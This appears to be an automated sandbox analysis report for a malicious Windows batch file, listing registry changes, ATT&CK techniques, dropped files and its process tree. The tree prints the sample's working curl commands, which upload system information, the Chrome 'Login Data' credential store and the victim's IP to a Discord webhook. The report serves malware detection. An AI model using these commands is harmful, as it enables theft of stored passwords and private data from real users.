f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb

Analysis

max time kernel
142s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28/05/2024, 20:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

oran (2).bat
Size

3KB
MD5

751db7140d2911f5bfc65cf03b42252f
SHA1

76ed57e4cf65e4735e916dc7d427f218191559c5
SHA256

f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb
SHA512

e46d6360e1753a3f809ae40873d5fcde355a1c2a2f2f7f6724bda1e4270ef616df9a00670551592439de5c14c00c94fc2be2e7581f3f391db17cac770eae2090

Score

7^/10

persistence

Malware Config

Signatures

Registers COM server for autorun 1 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
60	discord.com
61	discord.com
63	discord.com
64	discord.com
73	discord.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File created	\??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	\??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dxdiag.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	dxdiag.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3884	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4956	taskkill.exe
100	taskkill.exe
2392	taskkill.exe

Modifies registry class 36 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{78EE6B3D-7E90-4F79-BBC4-B5E380F4806C}	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject"	dxdiag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class"	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID	dxdiag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32	dxdiag.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
908	powershell.exe
908	powershell.exe
1460	dxdiag.exe
1460	dxdiag.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2140	WMIC.exe
Token: SeSecurityPrivilege	2140	WMIC.exe
Token: SeTakeOwnershipPrivilege	2140	WMIC.exe
Token: SeLoadDriverPrivilege	2140	WMIC.exe
Token: SeSystemProfilePrivilege	2140	WMIC.exe
Token: SeSystemtimePrivilege	2140	WMIC.exe
Token: SeProfSingleProcessPrivilege	2140	WMIC.exe
Token: SeIncBasePriorityPrivilege	2140	WMIC.exe
Token: SeCreatePagefilePrivilege	2140	WMIC.exe
Token: SeBackupPrivilege	2140	WMIC.exe
Token: SeRestorePrivilege	2140	WMIC.exe
Token: SeShutdownPrivilege	2140	WMIC.exe
Token: SeDebugPrivilege	2140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2140	WMIC.exe
Token: SeRemoteShutdownPrivilege	2140	WMIC.exe
Token: SeUndockPrivilege	2140	WMIC.exe
Token: SeManageVolumePrivilege	2140	WMIC.exe
Token: 33	2140	WMIC.exe
Token: 34	2140	WMIC.exe
Token: 35	2140	WMIC.exe
Token: 36	2140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2140	WMIC.exe
Token: SeSecurityPrivilege	2140	WMIC.exe
Token: SeTakeOwnershipPrivilege	2140	WMIC.exe
Token: SeLoadDriverPrivilege	2140	WMIC.exe
Token: SeSystemProfilePrivilege	2140	WMIC.exe
Token: SeSystemtimePrivilege	2140	WMIC.exe
Token: SeProfSingleProcessPrivilege	2140	WMIC.exe
Token: SeIncBasePriorityPrivilege	2140	WMIC.exe
Token: SeCreatePagefilePrivilege	2140	WMIC.exe
Token: SeBackupPrivilege	2140	WMIC.exe
Token: SeRestorePrivilege	2140	WMIC.exe
Token: SeShutdownPrivilege	2140	WMIC.exe
Token: SeDebugPrivilege	2140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2140	WMIC.exe
Token: SeRemoteShutdownPrivilege	2140	WMIC.exe
Token: SeUndockPrivilege	2140	WMIC.exe
Token: SeManageVolumePrivilege	2140	WMIC.exe
Token: 33	2140	WMIC.exe
Token: 34	2140	WMIC.exe
Token: 35	2140	WMIC.exe
Token: 36	2140	WMIC.exe
Token: SeDebugPrivilege	908	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1460	dxdiag.exe
4400	OpenWith.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 1152 wrote to memory of 4268	1152	cmd.exe	90
PID 1152 wrote to memory of 4268	1152	cmd.exe	90
PID 1152 wrote to memory of 3400	1152	cmd.exe	91
PID 1152 wrote to memory of 3400	1152	cmd.exe	91
PID 3400 wrote to memory of 2140	3400	cmd.exe	92
PID 3400 wrote to memory of 2140	3400	cmd.exe	92
PID 1152 wrote to memory of 3884	1152	cmd.exe	94
PID 1152 wrote to memory of 3884	1152	cmd.exe	94
PID 1152 wrote to memory of 4316	1152	cmd.exe	95
PID 1152 wrote to memory of 4316	1152	cmd.exe	95
PID 4316 wrote to memory of 908	4316	cmd.exe	96
PID 4316 wrote to memory of 908	4316	cmd.exe	96
PID 1152 wrote to memory of 1460	1152	cmd.exe	97
PID 1152 wrote to memory of 1460	1152	cmd.exe	97
PID 1152 wrote to memory of 636	1152	cmd.exe	107
PID 1152 wrote to memory of 636	1152	cmd.exe	107
PID 1152 wrote to memory of 4988	1152	cmd.exe	108
PID 1152 wrote to memory of 4988	1152	cmd.exe	108
PID 1152 wrote to memory of 4004	1152	cmd.exe	109
PID 1152 wrote to memory of 4004	1152	cmd.exe	109
PID 1152 wrote to memory of 548	1152	cmd.exe	110
PID 1152 wrote to memory of 548	1152	cmd.exe	110
PID 548 wrote to memory of 3164	548	cmd.exe	111
PID 548 wrote to memory of 3164	548	cmd.exe	111
PID 1152 wrote to memory of 2300	1152	cmd.exe	112
PID 1152 wrote to memory of 2300	1152	cmd.exe	112
PID 1152 wrote to memory of 3060	1152	cmd.exe	113
PID 1152 wrote to memory of 3060	1152	cmd.exe	113
PID 1152 wrote to memory of 4956	1152	cmd.exe	114
PID 1152 wrote to memory of 4956	1152	cmd.exe	114
PID 1152 wrote to memory of 100	1152	cmd.exe	115
PID 1152 wrote to memory of 100	1152	cmd.exe	115
PID 1152 wrote to memory of 2392	1152	cmd.exe	116
PID 1152 wrote to memory of 2392	1152	cmd.exe	116
PID 1152 wrote to memory of 1008	1152	cmd.exe	117
PID 1152 wrote to memory of 1008	1152	cmd.exe	117
PID 1152 wrote to memory of 988	1152	cmd.exe	119
PID 1152 wrote to memory of 988	1152	cmd.exe	119

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1152
- C:\Windows\system32\fltMC.exe
  fltmc
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic os get LocalDateTime /VALUE 2>NUL
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic os get LocalDateTime /VALUE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -c "[guid]::NewGuid().ToString()"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -c "[guid]::NewGuid().ToString()"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:908
- C:\Windows\system32\dxdiag.exe
  dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt
  2⤵
  - Registers COM server for autorun
  - Drops file in System32 directory
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1460
- C:\Windows\system32\curl.exe
  curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\":\"g:b2af19bf-449f-4d89-9b01-30774846a846\"}" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
  2⤵
  PID:636
- C:\Windows\system32\curl.exe
  curl -F "file1=@c:\dxdiag.txt" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
  2⤵
  PID:4988
- C:\Windows\system32\curl.exe
  curl -F "file1=@C:\Users\Admin\Appdata\Local\Google\Chrome\User Data\Default\Login Data" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
  2⤵
  PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl ifcfg.me
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:548
- - C:\Windows\system32\curl.exe
    curl ifcfg.me
    3⤵
    PID:3164
- C:\Windows\system32\curl.exe
  curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 https://api.thebase64.com/encode?secret=your_secret
  2⤵
  PID:2300
- C:\Windows\system32\curl.exe
  curl -F "[email protected]" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"
  2⤵
  PID:3060
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM explorer.exe :: restart
  2⤵
  - Kills process with taskkill
  PID:4956
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM chrome.exe :: restart
  2⤵
  - Kills process with taskkill
  PID:100
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM discord.exe :: restart
  2⤵
  - Kills process with taskkill
  PID:2392
- C:\Windows\system32\calc.exe
  calc.exe :: restart
  2⤵
  - Modifies registry class
  PID:1008
- C:\Windows\system32\notepad.exe
  notepad.exe :: restart
  2⤵
  PID:988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
1⤵
PID:2928

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_seplbejy.aym.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.txt

Filesize
33B

MD5
69a7bf89dc20b524780cbb7447e34e9f

SHA1
b824ed67b6741a0a94b8f2cc89449f3b783fb9de

SHA256
b36eceb65ade81a9c859af73ce6cfa2a756c85cc9461d523df36546fadd32d44

SHA512
f1ae5eabecaa4b15c2d9b38f6565c48636b6bc1a70fae4a2aa5b4d7b1215d886663b6a2f9c813fb1ef7af3b467cd3fe3bb5276c12b01aa07087237dd373fa780

Download Submit
\??\c:\dxdiag.txt

Filesize
86KB

MD5
14f366966c1763605aa6939cfe9ea0cd

SHA1
86b247165b6dda23a8fe57541c5f5db1f35ed901

SHA256
c0915a684ece3e7ab8c60a9787fa1a81a8c492ab0041af0a8e6b9ff1618efafa

SHA512
538fda37a1245ed5bf9f4dfbdb032ac732f50af201a37febf9abb640d7b9b1b5f982084655fa37156fa290baccd37a55da864b6e20fb0628bcbec815794c1bdd

Download Submit
memory/908-1-0x00007FF8A2163000-0x00007FF8A2165000-memory.dmp

Filesize
8KB

Download
memory/908-11-0x00000194EC170000-0x00000194EC192000-memory.dmp

Filesize
136KB

Download
memory/908-14-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

Filesize
10.8MB

Download
memory/908-15-0x00007FF8A2160000-0x00007FF8A2C21000-memory.dmp

Filesize
10.8MB

Download
memory/1460-22-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-17-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-28-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-27-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-26-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-25-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-24-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-23-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-18-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download
memory/1460-16-0x00000139051B0000-0x00000139051B1000-memory.dmp

Filesize
4KB

Download